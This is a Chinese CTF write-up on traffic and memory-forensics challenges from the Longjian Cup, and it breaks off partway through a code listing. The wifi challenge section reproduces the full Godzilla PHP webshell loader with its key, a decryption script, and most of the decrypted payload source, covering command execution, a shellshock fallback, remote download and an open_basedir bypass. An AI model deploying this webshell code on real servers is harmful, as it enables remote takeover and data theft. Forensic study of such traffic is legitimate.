写在前面最近参加了首届陇剑杯,和往常的CTF不太一样,题目基本都是流量分析类型的,我也是第一次接触这方面,还挺有意思的。写的不好的地方请各位师傅多多指正~这里要感谢共同参与比赛的几…
写在前面
最近参加了首届陇剑杯,和往常的CTF不太一样,题目基本都是流量分析类型的,我也是第一次接触这方面,还挺有意思的。写的不好的地方请各位师傅多多指正~这里要感谢共同参与比赛的几位师傅。
1.签到
签到题是其中最简单的分析流量了。
Wireshark打开附件Good.pcapng:
可以看到可能遭受ARP攻击,所以flag是arp。
2.JWT
这里先来讲一下什么是JWT。
JWT即JSON Web Token。JWT 的原理是,服务器认证以后,生成一个 JSON 对象,发回给用户,以后,用户与服务端通信的时候,都要发回这个JSON对象。服务器完全只靠这个对象认定用户身份。为了防止用户篡改数据,服务器在生成这个对象的时候,会加上签名,服务器就不保存任何session数据了,也就是说,服务器变成无状态了,从而比较容易实现扩展。
那么这里既然涉及到Token,那么题目应该就会从Token值这里来下手了。那么2.2就出现了:
用Wireshark打开附件goroot.pcap:
先在/identity下找到了username为admin:
然后在对应的cookie里找到了Token值:
将Token值用base64解码之后便可得到id值为10087了。故flag为10087#admin
2.3是寻找黑客获取webshell后的权限,那么首先就是来找whoami:
在过滤器里搜索http matches "(.*?)whoami"
右键点击追踪流,追踪http流:
然后在追踪该响应包的http流,找到了root权限
这里额外补充其中ios中的查找黑客利用的Github开源项目的名字:
在过滤器里搜索http matches "(.*?)git"(或者github也可)
可以看到黑客直接在本地用wget命令来获取GitHub上的项目,项目名称为Stowaway,这里我们也可以直接复制粘贴访问该项目查看下:
故flag为stowaway。
2.4是寻找黑客上传的恶意文件名字。那么Wireshark打开附件,要查找上传点的文件一般过滤只看post:
http.request.method=="POST"
这里发现一段base64,发现需要分段解出得到一段c语言程序:
继续往下找
发现1.c文件,但不确定继续往下看
这里把1.c文件重命名为了looter.c文件,应该可以确定上传的文件就是1.c了
2.5查找黑客在服务器上编译的恶意so文件名字,这个很简单,有两种解决方法:
一种就直接用Wireshark全局搜索.so即可定位文件名为:looter.so:
另外一种方法是直接用记事本打开并搜索.so,即可得到想要的答案了:
故flag答案为looter.so
3.webshell
3.1需要查找黑客登陆系统使用的密码,这里稍微信息收集下收集到用的是php后缀,那么就直接在过滤器里搜索http.request.method =="POST" && http contains "php",点击第一个,查看到密码:
3.2是查找黑客修改的一个日志文件的绝对路径,那么同理还是在过滤器里搜索http.request.method =="POST" && http contains "php",点击找到log文件data/Runtime/Logs/Home/21_08_07.log:
可是这里只是一个相对路径,在响应包中找到对应的/var/www/html,拼接一下即为绝对路径flag:
/var/www/html/data/Runtime/Logs/Home/21_08_07.log
3.3同2.3一样是寻找黑客获取webshell后的权限,这里用另外一种方法来查找:
在过滤器里搜索http.request.method =="POST" && http contains "php",找到whoami:
右键点击追踪流,追踪http流
找到对应的响应包
右键追踪http流,在其中找到权限
3.4则是查找黑客写入的webshell文件名称,那么用wireshark打开附件hack.pcap:
直接看到webshell为1.php。
3.5是寻找黑客上传的代理工具客户端名字。这个直接定位到最后一个响应包,右键点击追踪流,追踪http流:
在里面找到了frpc和frpc.ini,所以flag就是frpc。这个是啥应该不用多说了。
4.日志分析与简单日志分析
在日志分析中,开局直接打开txt文件,ctrl+F查找200,便找到了www.zip,这个即为网络存在源码泄漏所泄露的源码文件名,即flag:
然后来了一个查找黑客往/tmp目录写入的一个文件名称,那么直接ctrl+F查找200,一直往下翻到一个200的file参数,其等于sess_car,那么flag就是sess_car了:
最后让我分析攻击流量,分析黑客使用的是什么类来读取了秘密文件。这里找到了一个似乎是用python写的脚本请求:
将filename后面这一串放到url编码中解码,可以看到这里是用的php反序列化来读取秘密文件,类为SplFileObject,故flag就是SplFileObject
在简单日志分析中,确实也是比较简单。用记事本打开日志文件:
即可查看到黑客攻击的参数为user,这个就是flag了。
然后是需要黑客查看的秘密文件的绝对路径。这里找到第二段base64编码数据解开:
得到绝对路径:/Th4s_IS_VERY_Import_Fi1e
最后是寻找黑客反弹shell的ip和端口。这里找到最后一段base64解密:
或者也可以用burpsuite先url解码,再base64解码可得flag答案:192.168.2.197:8888
5.SQL注入
记事本打开日志文件直接翻到文件后面
这句是查询字段flag从sqli数据库中的flag表,所以flag答案为:sqli#flag#flag
6.端口扫描
这里讲其中一个查找黑客端口扫描的扫描器的扫描范围。
首先打开统计—端点:
按照portB排序,一般而言,端口扫描都是连续性有规则的端口,从这里我们能看到起始端口是10:
拉到最底下我们统计出末尾端口为449:
那么最终答案便是10-499
7.wifi
描述
网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量。小王往upload-labs上传木马后进行了cat /flag,flag内容究竟是啥呢?(压缩包里有解压密码的提示,需要额外添加花括号)
题解
想要解出这一题需要使用到Volatility这个开源的取证框架,这个框架能够对导出的内存镜像镜像分析,能过通过获取内核的数据结构,使用插件获取内存的详细情况和运行状态,同时可以直接dump系统文件,屏幕截图,查看进程等等。
首先内存镜像分析,先看看imageinfo探测系统类型
volatility -f Windows\ 7-dde00fa9.vmem imageinfo
cmdscan查看最近命令,这个命令为导出wifi的密码
volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 cmdscan
filescan查看该文件夹里的东西,发现My_Wifi.zip
volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Program Files"
打开zip发现hintpassword is Network Adapter GUID,需要网卡的GUID,GUID在Windows的C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\文件夹内
volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces"
为{529B7D2A-05D1-4F21-A001-8F4FF817FC3A},解压后wifi信息为:
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
<name>My_Wifi</name>
<SSIDConfig>
<SSID>
<hex>4D795F57696669</hex>
<name>My_Wifi</name>
</SSID>
</SSIDConfig>
<connectionType>ESS</connectionType>
<connectionMode>auto</connectionMode>
<MSM>
<security>
<authEncryption>
<authentication>WPA2PSK</authentication>
<encryption>AES</encryption>
<useOneX>false</useOneX>
</authEncryption>
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>233@114514_qwe</keyMaterial>
</sharedKey>
</security>
</MSM>
</WLANProfile>
发现密码为233@114514_qwe,有了这个Wifi密码我们可以解密客户端的cap流量包
airdecap-ng -e My_Wifi -p 233@114514_qwe 客户端.cap
然后分析后找到
有一些这种密文,这时候我们再通过服务器那边的流量
我们可以发现其是两两对应的,我们先拿服务器的流量解密一下
第一层是url解码(太多就不全放出来了)
pass=eval(base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1Z
然后是
pass=eval(base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD'))));
和
key=R0YEQgNVBE0GQ0YPU0YTUhoeTAtvMkVmMHRmD1NGE1IaHkwLbzIHTA1SQVtdWkFBFlhNFBJVEhAYPD8SEhRBQQZyAFYxQRJNBlxzR1xXSRpYO28QQhhBHTxicGEPEgZWF2UAQxFRDldLGA4/OBRBE0N2FlURSwhWDW5GRlNGFRtKDWg6QhhBGUdCUEFBXQ56BwsIVFcQElwQQlxdXGsIV0sfTAtvMkEZQxFcVBIcCEAQUxEYRmcyfDBi省略
组成,第一段的是一段倒叙base64,解密后得到
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (stripos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
然后我们可以看到第二段的加密形式是一个xor,稍微写一下解密脚本:
import base64
import os
def decode(D,K):
D = list(D)
for i in range(len(D)):
c = K[i+1&15]
D[i] = D[i]^c
return bytes(D)
_pass = 'pass'
key = '3c6e0b8a9c15224a'
p='R0YEQgNVBE0GQ0YPU0YTUhoeTAtvMkVmMHRmD1NGE1IaHkwLbzIHTA1SQVtdWkFBFlhNFBJVEhAYPD8SEhRBQQZyAFYxQRJNBlxzR1xXSRpYO28QQhhBHTxicGEPEgZWF2UAQxFRDldLGA4/OBRBE0N2FlURSwhWDW5GRlNGFRtKDWg6QhhBGUdCUEFBXQ56BwsIVFcQElwQQlxdXGsIV0sfTAtvMkEZQxFcVBIcCEAQUxEYRmcyfDBifH18b0VABkUWWQ1xBWRKGE4/OBRBE0MWRRBCHD5qJmIIR1xHBEEKVwlZGF1JETAAeFtFbThBS1QEQwcOVX0GUlpWVxxFbDBzNmMrdy9iR0JQQUFdDnoHa0kUEV0SSgpefFYbGEVABkUWWQ1xBRBKGA4/OBRBE0NLaDpCGEEZI0JQQUFdDl08QRdZFl0+Wg9eRlcaHVo+aTtvEEIYQVAFER1RU1oiUg9aIkoLSCVcAF5RVxodXA5SEENwC0smQwpBZkZAUQBeSxIVXRERSEJuOxUSEhRBE0MWQUAPS1xeGVVQUV1QBBtHRghDSwNsM0MRFRJPOWsTQxZFVg1KDFgXYVRAU1kERwZETRQSVRIQWDw/PzgUQRNDXwMQSlESSgZFHRZtZyRgOBQHSRJZEko8XkVXXGsDUhBTAVkQGjwQRRcRbWFxMmhBVBxAA0sSZgxBUFxtVgBABlIMQkBlXAQXQ0BXG09sOUMWRRBCGEEZI1NMQlNHEmwMRgBePVoASgZVXEAaHVo+aRZFEEJFbDNuOxUSEhRFQQZFEFwWBQRPAl1zR1xXSRpYO289aBhBGUNYUxIaED5gJmVEDV9WFFUPGE4/OBRBE0MWRRBCSwRKEFhaXG1HFVIRQk0ZWTVrGUMRFRISFEEXPGUgYzFxLnc4FUZXQUcIXCpSOA0AWRJcVQVqV1xXDlcGHjYBL1EWYDpDHUFXRghSD18fVUocPmomYhweFkcEQBBfCnkGEUgCbjsVEhIUQRNDFiVDB0sSUAxfakVAXRVWPFUJXxFdSRBYPD8SEhRBTm48aDpCGEEZClcVGlFVD3ACWgl3GFERfA1SWlZXHEgaGDtvEEIYQRlDERUWQFESRg9CWFcYXQ9aDFVQGhZGBEAWWhEcVBFaNGkRFRISSWw5bjxFEEIYE1wXREdcEhATVhBDCURZNWtEbjtTR1xXFVoMWEVjU3UITjpoRxoWcE0XKB8ePWgYQRlDV1pAGhAIDlMNQVleSxVLD1RbGhZwSAhHX04bSxgaNGkRFRISFEETQxIha0ZRPBleERF2aRAIbj0SLmtKHAgSUhgQAwdpWj5pFkUQQkVsM0MRFRJAURVGEVhFFCYDbDMePD9UR1oCRwpZCxAQXSVcBWJMQUZRDHUWWAYYS0NsM0MRFRJbUkEbQlAQXgFMCFYNblBKW0cVQEsUA1kOXT5eBkVqUV1aFVYNQhYSSxFBQm47FRISFEETQxYDRQxbFVAMXxVUW1gEbARTEW8BVw9NBl9BQRoQB1oPU0wQGTVrGUMRFRISFEETQxZFFAQYXBkjV1pCV1pJFwVfCVVOGhNbQRgOPzgUQRNDFkUQQhhBGUMVVl1cQARdF0VFDUJeAFUQVA4/OBRBE0MWRRBCGEEZQ1hTEhoQBxpDTWg6QhhBGUMRFRISFEETQxZFEAZXQUJDFVZdXEAEXRdFRR5fGAdeBkVGGhZSSAhDS0VHClENXEMZFFRXWwcbR1BMGVk1axlDERUSEhRBE0MWRU1vMkEZQxEVEhIUQRNDFgNTDlcSXEsVUxsJOWsTQxZFEEIYQRlDERVAV0AUQQ0WQVMNVhVcDUVGCT8+QRNDFkUQQhgcNGkRFRISSWw5QxZFEAteQRFCV0BcUUAIXA1pAEgLSx'
p1 = base64.b64decode(p)
res = decode(p1,key.encode())
f = open('res.php','wb')
f.write(res)
f.close()
得到res.php
$parameters=array();
$_SES=array();
function run($pms){
reDefSystemFunc();
$_SES=&getSession();
@session_start();
$sessioId=md5(session_id());
if (isset($_SESSION[$sessioId])){
$_SES=unserialize((S1MiwYYr(base64Decode($_SESSION[$sessioId],$sessioId),$sessioId)));
}
@session_write_close();
if (canCallGzipDecode()==1&&@isGzipStream($pms)){
$pms=gzdecode($pms);
}
formatParameter($pms);
if (isset($_SES["bypass_open_basedir"])&&$_SES["bypass_open_basedir"]==true){
@bypass_open_basedir();
}
$result=evalFunc();
if ($_SES!==null){
session_start();
$_SESSION[$sessioId]=base64_encode(S1MiwYYr(serialize($_SES),$sessioId));
@session_write_close();
}
if (canCallGzipEncode()){
$result=gzencode($result,6);
}
return $result;
}
function S1MiwYYr($D,$K){
for($i=0;$i<strlen($D);$i++) {
$D[$i] = $D[$i]^$K[($i+1)%15];
}
return $D;
}
function reDefSystemFunc(){
if (!function_exists("file_get_contents")) {
function file_get_contents($file) {
$f = @fopen($file,"rb");
$contents = false;
if ($f) {
do { $contents .= fgets($f); } while (!feof($f));
}
fclose($f);
return $contents;
}
}
if (!function_exists('gzdecode')&&function_existsEx("gzinflate")) {
function gzdecode($data)
{
return gzinflate(substr($data,10,-8));
}
}
}
function &getSession(){
global $_SES;
return $_SES;
}
function bypass_open_basedir(){
@$_FILENAME = @dirname($_SERVER['SCRIPT_FILENAME']);
$allFiles = @scandir($_FILENAME);
$cdStatus=false;
if ($allFiles!=null){
foreach ($allFiles as $fileName) {
if ($fileName!="."&&$fileName!=".."){
if (@is_dir($fileName)){
if (@chdir($fileName)===true){
$cdStatus=true;
break;
}
}
}
}
}
if(!@file_exists('bypass_open_basedir')&&!$cdStatus){
@mkdir('bypass_open_basedir');
}
if (!$cdStatus){
@chdir('bypass_open_basedir');
}
@ini_set('open_basedir','..');
@$_FILENAME = @dirname($_SERVER['SCRIPT_FILENAME']);
@$_path = str_replace("\\",'/',$_FILENAME);
@$_num = substr_count($_path,'/') + 1;
$_i = 0;
while($_i < $_num){
@chdir('..');
$_i++;
}
@ini_set('open_basedir','/');
if (!$cdStatus){
@rmdir($_FILENAME.'/'.'bypass_open_basedir');
}
}
function formatParameter($pms){
global $parameters;
$index=0;
$key=null;
while (true){
$q=$pms[$index];
if (ord($q)==0x02){
$len=bytesToInteger(getBytes(substr($pms,$index+1,4)),0);
$index+=4;
$value=substr($pms,$index+1,$len);
$index+=$len;
$parameters[$key]=$value;
$key=null;
}else{
$key.=$q;
}
$index++;
if ($index>strlen($pms)-1){
break;
}
}
}
function evalFunc(){
try{
@session_write_close();
$className=get("codeName");
$methodName=get("methodName");
$_SES=&getSession();
if ($methodName!=null){
if (strlen(trim($className))>0){
if ($methodName=="includeCode"){
return includeCode();
}else{
if (isset($_SES[$className])){
return eval($_SES[$className]);
}else{
return "{$className} no load";
}
}
}else{
if (function_exists($methodName)){
return $methodName();
}else{
return "function {$methodName} not exist";
}
}
}else{
return "methodName Is Null";
}
}catch (Exception $e){
return "ERROR://".$e -> getMessage();
}
}
function deleteDir($p){
$m=@dir($p);
while(@$f=$m->read()){
$pf=$p."/".$f;
@chmod($pf,0777);
if((is_dir($pf))&&($f!=".")&&($f!="..")){
deleteDir($pf);
@rmdir($pf);
}else if (is_file($pf)&&($f!=".")&&($f!="..")){
@unlink($pf);
}
}
$m->close();
@chmod($p,0777);
return @rmdir($p);
}
function deleteFile(){
$F=get("fileName");
if(is_dir($F)){
return deleteDir($F)?"ok":"fail";
}else{
return (file_exists($F)?@unlink($F)?"ok":"fail":"fail");
}
}
function setFileAttr(){
$type = get("type");
$attr = get("attr");
$fileName = get("fileName");
$ret = "Null";
if ($type!=null&&$attr!=null&&$fileName!=null) {
if ($type=="fileBasicAttr"){
if (@chmod($fileName,convertFilePermissions($attr))){
return "ok";
}else{
return "fail";
}
}else if ($type=="fileTimeAttr"){
if (@touch($fileName,$attr)){
return "ok";
}else{
return "fail";
}
}else{
return "no ExcuteType";
}
}else{
$ret="type or attr or fileName is null";
}
return $ret;
}
function fileRemoteDown(){
$url=get("url");
$saveFile=get("saveFile");
if ($url!=null&&$saveFile!=null) {
$data=@file_get_contents($url);
if ($data!==false){
if (@file_put_contents($saveFile,$data)!==false){
@chmod($saveFile,0777);
return "ok";
}else{
return "write fail";
}
}else{
return "read fail";
}
}else{
return "url or saveFile is null";
}
}
function copyFile(){
$srcFileName=get("srcFileName");
$destFileName=get("destFileName");
if (@is_file($srcFileName)){
if (copy($srcFileName,$destFileName)){
return "ok";
}else{
return "fail";
}
}else{
return "The target does not exist or is not a file";
}
}
function moveFile(){
$srcFileName=get("srcFileName");
$destFileName=get("destFileName");
if (rename($srcFileName,$destFileName)){
return "ok";
}else{
return "fail";
}
}
function getBasicsInfo()
{
$data = array();
$data['OsInfo'] = @php_uname();
$data['CurrentUser'] = @get_current_user();
$data['CurrentUser'] = strlen(trim($data['CurrentUser'])) > 0 ? $data['CurrentUser'] : 'NULL';
$data['REMOTE_ADDR'] = @$_SERVER['REMOTE_ADDR'];
$data['REMOTE_PORT'] = @$_SERVER['REMOTE_PORT'];
$data['HTTP_X_FORWARDED_FOR'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];
$data['HTTP_CLIENT_IP'] = @$_SERVER['HTTP_CLIENT_IP'];
$data['SERVER_ADDR'] = @$_SERVER['SERVER_ADDR'];
$data['SERVER_NAME'] = @$_SERVER['SERVER_NAME'];
$data['SERVER_PORT'] = @$_SERVER['SERVER_PORT'];
$data['disable_functions'] = @ini_get('disable_functions');
$data['disable_functions'] = strlen(trim($data['disable_functions'])) > 0 ? $data['disable_functions'] : @get_cfg_var('disable_functions');
$data['Open_basedir'] = @ini_get('open_basedir');
$data['timezone'] = @ini_get('date.timezone');
$data['encode'] = @ini_get('exif.encode_unicode');
$data['extension_dir'] = @ini_get('extension_dir');
$data['sys_get_temp_dir'] = @sys_get_temp_dir();
$data['include_path'] = @ini_get('include_path');
$data['DOCUMENT_ROOT'] = $_SERVER['DOCUMENT_ROOT'];
$data['PHP_SAPI'] = PHP_SAPI;
$data['PHP_VERSION'] = PHP_VERSION;
$data['PHP_INT_SIZE'] = PHP_INT_SIZE;
$data['canCallGzipDecode'] = canCallGzipDecode();
$data['canCallGzipEncode'] = canCallGzipEncode();
$data['session_name'] = @ini_get("session.name");
$data['session_save_path'] = @ini_get("session.save_path");
$data['session_save_handler'] = @ini_get("session.save_handler");
$data['session_serialize_handler'] = @ini_get("session.serialize_handler");
$data['user_ini_filename'] = @ini_get("user_ini.filename");
$data['memory_limit'] = @ini_get('memory_limit');
$data['upload_max_filesize'] = @ini_get('upload_max_filesize');
$data['post_max_size'] = @ini_get('post_max_size');
$data['max_execution_time'] = @ini_get('max_execution_time');
$data['max_input_time'] = @ini_get('max_input_time');
$data['default_socket_timeout'] = @ini_get('default_socket_timeout');
$data['mygid'] = @getmygid();
$data['mypid'] = @getmypid();
$data['SERVER_SOFTWAREypid'] = @$_SERVER['SERVER_SOFTWARE'];
$data['SERVER_PORT'] = @$_SERVER['SERVER_PORT'];
$data['loaded_extensions'] = @implode(',', @get_loaded_extensions());
$data['short_open_tag'] = @get_cfg_var('short_open_tag');
$data['short_open_tag'] = @(int)$data['short_open_tag'] == 1 ? 'true' : 'false';
$data['asp_tags'] = @get_cfg_var('asp_tags');
$data['asp_tags'] = (int)$data['asp_tags'] == 1 ? 'true' : 'false';
$data['safe_mode'] = @get_cfg_var('safe_mode');
$data['safe_mode'] = (int)$data['safe_mode'] == 1 ? 'true' : 'false';
$data['CurrentDir'] = str_replace('\\', '/', @dirname($_SERVER['SCRIPT_FILENAME']));
$SCRIPT_FILENAME=@dirname($_SERVER['SCRIPT_FILENAME']);
$data['FileRoot'] = '';
if (substr($SCRIPT_FILENAME, 0, 1) != '/') {foreach (range('A', 'Z') as $L){ if (@is_dir("{$L}:")){ $data['FileRoot'] .= "{$L}:/;";\}\};};
$data['FileRoot'] = (strlen(trim($data['FileRoot'])) > 0 ? $data['FileRoot'] : '/');
$data['FileRoot']= substr_count($data['FileRoot'],substr($SCRIPT_FILENAME, 0, 1))<=0?substr($SCRIPT_FILENAME, 0, 1).":/":$data['FileRoot'];
$result="";
foreach($data as $key=>$value){
$result.=$key." : ".$value."\n";
}
return $result;
}
function getFile(){
$dir=get('dirName');
$dir=(strlen(@trim($dir))>0)?trim($dir):str_replace('\\','/',dirname(__FILE__));
$dir.="/";
$path=$dir;
$allFiles = @scandir($path);
$data="";
if ($allFiles!=null){
$data.="ok";
$data.="\n";
$data.=$path;
$data.="\n";
foreach ($allFiles as $fileName) {
if ($fileName!="."&&$fileName!=".."){
$fullPath = $path.$fileName;
$lineData=array();
array_push($lineData,$fileName);
array_push($lineData,@is_file($fullPath)?"1":"0");
array_push($lineData,date("Y-m-d H:i:s", @filemtime($fullPath)));
array_push($lineData,@filesize($fullPath));
$fr=(@is_readable($fullPath)?"R":"").(@is_writable($fullPath)?"W":"").(@is_executable($fullPath)?"X":"");
array_push($lineData,(strlen($fr)>0?$fr:"F"));
$data.=(implode("\t",$lineData)."\n");
}
}
}else{
return "Path Not Found Or No Permission!";
}
return $data;
}
function readFileContent(){
$fileName=get("fileName");
if (@is_file($fileName)){
if (@is_readable($fileName)){
return file_get_contents($fileName);
}else{
return "No Permission!";
}
}else{
return "File Not Found";
}
}
function uploadFile(){
$fileName=get("fileName");
$fileValue=get("fileValue");
if (@file_put_contents($fileName,$fileValue)!==false){
@chmod($fileName,0777);
return "ok";
}else{
return "fail";
}
}
function newDir(){
$dir=get("dirName");
if (@mkdir($dir,0777,true)!==false){
return "ok";
}else{
return "fail";
}
}
function newFile(){
$fileName=get("fileName");
if (@file_put_contents($fileName,"")!==false){
return "ok";
}else{
return "fail";
}
}
function function_existsEx($functionName){
$d=explode(",",@ini_get("disable_functions"));
if(empty($d)){
$d=array();
}else{
$d=array_map('trim',array_map('strtolower',$d));
}
return(function_exists($functionName)&&is_callable($functionName)&&!in_array($functionName,$d));
}
function execCommand(){
@ob_start();
$cmdLine=get("cmdLine");
$d=__FILE__;
$cmdLine=substr($d,0,1)=="/"?"-c \"{$cmdLine}\"":"/c \"{$cmdLine}\"";
if(substr($d,0,1)=="/"){
@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
}else{
@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
}
$executeFile=substr($d,0,1)=="/"?"sh":"cmd";
$cmdLine="{$executeFile} {$cmdLine}";
$cmdLine=$cmdLine." 2>&1";
$ret=0;
if (!function_exists("runshellshock")){
function runshellshock($d, $c) {
if (substr($d, 0, 1) == "/" && function_existsEx('putenv') && (function_existsEx('error_log') || function_existsEx('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (function_existsEx('error_log')) {
error_log("a", 1);
} else {
mail("a@127.0.0.1", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
};
}
if(function_existsEx('system')){
@system($cmdLine,$ret);
}elseif(function_existsEx('passthru')){
@passthru($cmdLine,$ret);
}elseif(function_existsEx('shell_exec')){
print(@shell_exec($cmdLine));
}elseif(function_existsEx('exec')){
@exec($cmdLine,$o,$ret);
print(join("\n",$o));
}elseif(function_existsEx('popen')){
$fp=@popen($cmdLine,'r');
while(!@feof($fp)){
print(@fgets($fp,2048));
}
@pclose($fp);
}elseif(function_existsEx('proc_open')){
$p = @proc_open($cmdLine, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while(!@feof($io[1])){
print(@fgets($io[1],2048));
}
while(!@feof($io[2])){
print(@fgets($io[2],2048));
}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);
}elseif(runshellshock($d, $cmdLine)) {
print($ret);
}elseif(substr($d,0,1)!="/" && @class_exists("COM")){
$w=new COM('WScript.shell');
$e=$w->exec($cmdLine);
$so=$e->StdOut();
print($so->ReadAll());
$se=$e->StdErr();
print($se->ReadAll());
}else{
return "none of proc_open/passthru/shell_exec/exec/exec/popen/COM/runshellshock is available";
}
print(($ret!=0)?"ret={$ret}":"");
$result = @ob_get_contents();
@ob_end_clean();
return $result;
}
function execSql(){
$dbType=get("dbType");
$dbHost=get("dbHost");
$dbPort=get("dbPort");
$username=get("dbUsername");
$password=get("dbPassword");
$execType=get("execType");
$execSql=get("execSql");
function mysql_exec($host,$port,$username,$password,$execType,$sql){
// 创建连接
$conn = new mysqli($host,$username,$password,"",$port);
// Check connection
if ($conn->connect_error) {
return $conn->connect_error;
}
$result = $conn->query($sql);
if ($conn->error){
return $conn->error;
}
$result = $conn->query($sql);
if ($execType=="update"){
return "Query OK, "+$conn->affected_rows+" rows affected";
}else{
$data="ok\n";
while ($column = $result->fetch_field()){
$data.=base64_encode($column->name)."\t";
}
$data.="\n";
if ($result->num_rows > 0) {
// 输出数据
while($row = $result->fetch_assoc()) {
foreach ($row as $value){
$data.=base64_encode($value)."\t";
}
$data.="\n";
}
}
return $data;
}
}
function pdoExec($databaseType,$host,$port,$username,$password,$execType,$sql){
try {
$conn = new PDO("{$databaseType}:host=$host;port={$port};", $username, $password);
// 设置 PDO 错误模式为异常
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
if ($execType=="update"){
return "Query OK, "+$conn->exec($sql)+" rows affected";
}else{
$data="ok\n";
$stm=$conn->prepare($sql);
$stm->execute();
$row=$stm->fetch(PDO::FETCH_ASSOC);
$_row="\n";
foreach (array_keys($row) as $key){
$data.=base64_encode($key)."\t";
$_row.=base64_encode($row[$key])."\t";
}
$data.=$_row."\n";
while ($row=$stm->fetch(PDO::FETCH_ASSOC)){
foreach (array_keys($row) as $key){
$data.=base64_encode($row[$key])."\t";
}
$data.="\n";
}
return $data;
}
}
catch(PDOException $e)
{
return $e->getMessage();
}
}
if ($dbType=="mysql"){
if (extension_loaded("mysqli")){
